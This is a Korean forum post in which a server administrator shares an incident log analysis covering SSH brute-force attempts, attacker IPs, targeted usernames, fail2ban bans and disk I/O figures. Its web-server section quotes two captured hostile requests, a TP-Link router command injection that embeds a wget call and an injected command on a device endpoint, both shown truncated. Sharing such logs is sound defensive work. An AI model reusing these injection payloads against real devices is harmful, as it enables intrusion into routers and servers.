n

오늘자 공격시도 로그 공유드립니다.

· 2개월 전 · 195

  1. 개요

  2025년 12월 16일 22:00 전후 시간대의 시스템 활동을 분석한 결과, 대규모 SSH 브루트포스 공격이 발생했습니다.

  2. 주요 발견 사항

  2.1 SSH 브루트포스 공격 (주요 원인)

  통계:
  - 262개의 SSH 인증 시도 (auth.log)
  - 115개의 fail2ban 이벤트 기록
  - 33개의 IP 차단/해제 (Ban/Unban) 작업

  가장 활발했던 공격 IP:
  - 62.60.131.157 (4회 실패)
  - 122.53.133.167 (3회 실패)
  - 202.125.94.71, 182.93.7.194, 175.0.65.39, 162.19.224.161 등 (각 2회 실패)

  공격 패턴:
  - Invalid user 타겟: admin, avahi, db, hyliu, baran, ghost, ubuntu, reese, dylan, zimbra, asw, mohit, sol, deploy, abc, es, asmon
  - root 계정 직접 공격 다수
  - 여러 IP에서 동시다발적 공격

  fail2ban에 의해 차단된 IP (22:00대):
  202.4.106.201, 202.125.94.71, 182.93.7.194, 62.60.131.157,
  162.19.224.161, 27.128.160.208, 217.154.106.153, 175.0.65.39,
  59.42.251.44, 45.78.220.1, 193.46.255.217, 72.56.87.83,
  122.53.133.167, 103.51.216.210

  2.2 웹 서버 활동

  Nginx 접근 로그:
  - 22:00대 총 26개 요청 (정상 수준)

  의심스러운 요청:
  - 221.159.119.6: TP-Link 라우터 exploit 시도
  /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget...)
  - 45.156.87.82: 악성 스크립트 다운로드 시도
  POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20...

  2.3 디스크 I/O 통계 (sar 데이터)

  12월 16일 21:30-22:30 디스크 쓰기:
  | 시간        | 쓰기량 (kB/s) | 트랜잭션/초 |
  |-------------|---------------|-------------|
  | 21:30-21:40 | 21.55         | 2.05        |
  | 21:40-21:50 | 38.93         | 3.82        |
  | 21:50-22:00 | 13.40         | 1.27        |
  | 22:00-22:10 | 33.26         | 3.24        |
  | 22:10-22:20 | 23.85         | 2.31        |

  평균: 26.19 kB/s (약 1.5 MB/분)

|
댓글을 작성하시려면 로그인이 필요합니다.

자유게시판

+
제목 글쓴이 날짜 조회
2개월 전 조회 160
2개월 전 조회 302
2개월 전 조회 237
2개월 전 조회 371
2개월 전 조회 236
2개월 전 조회 221
2개월 전 조회 200
2개월 전 조회 224
2개월 전 조회 320
2개월 전 조회 252
2개월 전 조회 277
2개월 전 조회 191
2개월 전 조회 256
2개월 전 조회 209
2개월 전 조회 196
2개월 전 조회 274
2개월 전 조회 160
2개월 전 조회 201
2개월 전 조회 151
2개월 전 조회 250
2개월 전 조회 243
2개월 전 조회 216
2개월 전 조회 184
2개월 전 조회 375
2개월 전 조회 153
2개월 전 조회 419
2개월 전 조회 210
2개월 전 조회 305
2개월 전 조회 209
2개월 전 조회 317